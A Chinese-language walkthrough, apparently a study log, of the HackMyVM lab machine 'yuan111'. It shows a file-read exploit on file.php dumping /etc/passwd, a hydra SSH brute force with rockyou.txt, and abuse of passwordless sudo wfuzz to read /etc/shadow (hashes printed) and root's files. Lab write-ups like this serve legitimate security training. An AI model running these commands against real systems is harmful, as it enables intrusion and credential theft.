root@tlgjm:~$
[ 网络安全 ]

# HackMyVM - yuan111 靶机渗透记录

HackMyVM - yuan111 靶机渗透记录 环境与目标 靶机IP:192.168.56.110 暴露服务:22/tcp、80/tcp 目标:从 Web 入口拿到普通用户 shell,再进一步提权到 root 一、信息收集 1. 端口扫描 nmap -p 1-65535 -T4 -A -v 192.168.56.110 PORT STATE SERVICE VERSION 22/tcp open ssh Ope…

2026-05-04 [ 更新于 2026-05-04 ] [ 网络安全 ] [ 约 25 分钟 ]
#学习记录
HackMyVM - yuan111 靶机渗透记录

HackMyVM - yuan111 靶机渗透记录

环境与目标

  • 靶机IP:192.168.56.110
  • 暴露服务:22/tcp、80/tcp
  • 目标:从 Web 入口拿到普通用户 shell,再进一步提权到 root

一、信息收集

1. 端口扫描

nmap -p 1-65535 -T4 -A -v 192.168.56.110

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Rockyou.txt - \xE5\xAF\x86\xE7\xA0\x81\xE5\xAD\x97\xE5\x85\xB8\xE6\x96\x87\xE4\xBB\xB6\xE4\xBB\x8B\xE7\xBB\x8D
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.62 (Debian)

只开放了 22(SSH)和 80(HTTP),渗透入口优先从 Web 服务开始。

二、Web 枚举与任意文件读取

访问 80 端口主页,是一段 rockyou 字典的介绍说明,从命名上看是在暗示后续要用 rockyou 做爆破:

前端源码里没什么可以直接利用的点,用 dirsearch 跑一遍目录,发现 /file.php 路由是可访问的:

但是直接访问没有任何回显,根据命名猜测应该是要对参数做 fuzz:

# 盲跑获取基准,排除错误响应
wfuzz -c -w /usr/share/dirb/wordlists/common.txt http://192.168.56.110/file.php?FUZZ=/etc/passwd

# 使用过滤参数把这些无用的结果隐藏掉
wfuzz -c -w /usr/share/dirb/wordlists/common.txt --hh 0 http://192.168.56.110/file.php?FUZZ=/etc/passwd

可以确认有效参数是 file,并且存在任意文件读取漏洞:

curl http://192.168.56.110/file.php\?file\=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
tao:x:1000:1000:,,,:/home/tao:/bin/bash

可以确认普通用户为 tao。结合首页给的 rockyou 提示,这里基本可以判断接下来要对 tao 的 SSH 凭据进行字典爆破。

三、获取初始 shell

直接用 hydra 配合 rockyou.txt 对 SSH 进行爆破:

hydra -l tao -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.110 -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-04 11:17:24
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.56.110:22/
[22][ssh] host: 192.168.56.110   login: tao   password: rockyou
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-04 11:17:44

成功爆破出密码 rockyou,直接 SSH 登入 tao 用户,拿到普通用户 shell:

四、权限提升

拿到普通用户权限后,先查看 sudo 权限:

可以看到 tao 能够无密码使用 wfuzzid 两个命令。先在 gtfobins 上查找直接利用方式,没有现成的提权路径,需要自己挖掘。

id 只是用来查看当前用户的权限信息,没有可利用点,所以重点放在 wfuzz 上。wfuzz 支持插件扩展,但实际操作时发现:

  • 插件目录没有写权限;
  • 写到主目录下时,sudo 调用又加载不到;

后来意识到 wfuzz--dry-run 模式下会直接把字典内容打印出来,相当于可以把”读文件”伪装成”喂字典”:

sudo wfuzz --dry-run -w /root/root.txt http://127.0.0.1/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1/FUZZ
Total requests: 1

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                          
=====================================================================

000000001:   0          0 L      0 W        0 Ch        "flag{xxxx}"                                                                    

Total time: 0
Processed Requests: 1
Filtered Requests: 0
Requests/sec.: 0

可以直接拿到 root.txt 的内容,但这条路径并不能直接拿到 root shell。继续尝试读取 /etc/shadow

sudo wfuzz --dry-run -w /etc/shadow http://127.0.0.1/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1/FUZZ
Total requests: 26

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                          
=====================================================================

000000001:   0          0 L      0 W        0 Ch        "root:$6$N2l0GYAc2HyLxS2d$Ks1awHW0JPPVXft/ZpvptPLmh/P/XiBRqH8G1uTjpDhrLHUwmN2PK8.MqQcrIwSXf2CGxk.ue11f9hZzZdtkw1:
                                                        20460:0:99999:7:::"                                                                                              
000000007:   0          0 L      0 W        0 Ch        "man:*:20166:0:99999:7:::"                                                                                       
000000025:   0          0 L      0 W        0 Ch        "sshd:*:20166:0:99999:7:::"                                                                                      
000000017:   0          0 L      0 W        0 Ch        "gnats:*:20166:0:99999:7:::"                                                                                     
000000018:   0          0 L      0 W        0 Ch        "nobody:*:20166:0:99999:7:::"                                                                                    
000000005:   0          0 L      0 W        0 Ch        "sync:*:20166:0:99999:7:::"                                                                                      
000000004:   0          0 L      0 W        0 Ch        "sys:*:20166:0:99999:7:::"                                                                                       
000000002:   0          0 L      0 W        0 Ch        "daemon:*:20166:0:99999:7:::"                                                                                    
000000008:   0          0 L      0 W        0 Ch        "lp:*:20166:0:99999:7:::"                                                                                        
000000009:   0          0 L      0 W        0 Ch        "mail:*:20166:0:99999:7:::"                                                                                      
000000010:   0          0 L      0 W        0 Ch        "news:*:20166:0:99999:7:::"                                                                                      
000000011:   0          0 L      0 W        0 Ch        "uucp:*:20166:0:99999:7:::"                                                                                      
000000013:   0          0 L      0 W        0 Ch        "www-data:*:20166:0:99999:7:::"                                                                                  
000000012:   0          0 L      0 W        0 Ch        "proxy:*:20166:0:99999:7:::"                                                                                     
000000006:   0          0 L      0 W        0 Ch        "games:*:20166:0:99999:7:::"                                                                                     
000000016:   0          0 L      0 W        0 Ch        "irc:*:20166:0:99999:7:::"                                                                                       
000000026:   0          0 L      0 W        0 Ch        "tao:$6$kmyokhFHIyX4L4CM$74nCV6cf4jjTh3wLZb6EzTZ5efutQIUxTjfunweiLTcxLnJcqQGIumpKjSkU7yqxhJl5cs9ebmDtMMXgFcQyI1:2
                                                        0460:0:99999:7:::"                                                                                               
000000020:   0          0 L      0 W        0 Ch        "systemd-timesync:*:20166:0:99999:7:::"                                                                          
000000019:   0          0 L      0 W        0 Ch        "_apt:*:20166:0:99999:7:::"                                                                                      
000000021:   0          0 L      0 W        0 Ch        "systemd-network:*:20166:0:99999:7:::"                                                                           
000000022:   0          0 L      0 W        0 Ch        "systemd-resolve:*:20166:0:99999:7:::"                                                                           
000000023:   0          0 L      0 W        0 Ch        "systemd-coredump:!!:20166::::::"                                                                                
000000024:   0          0 L      0 W        0 Ch        "messagebus:*:20166:0:99999:7:::"                                                                                
000000003:   0          0 L      0 W        0 Ch        "bin:*:20166:0:99999:7:::"                                                                                       
000000015:   0          0 L      0 W        0 Ch        "list:*:20166:0:99999:7:::"                                                                                      
000000014:   0          0 L      0 W        0 Ch        "backup:*:20166:0:99999:7:::"                                                                                    

Total time: 0
Processed Requests: 26
Filtered Requests: 0
Requests/sec.: 0

可以拿到 root 的密码哈希,先用 john + rockyou 进行爆破,结果没有命中。

参考了一下其他师傅的 wp,注意到 wfuzz 还可以搭配 dirwalk 来枚举目录内容:

sudo wfuzz -z dirwalk,/root -u http://localhost/FUZZ

可以看到 /root 下还有一个文本文件,里面记录的就是 root 的密码:

直接 su root 输入该密码,即可拿到 root shell。

[ 评论区 ]

留言通道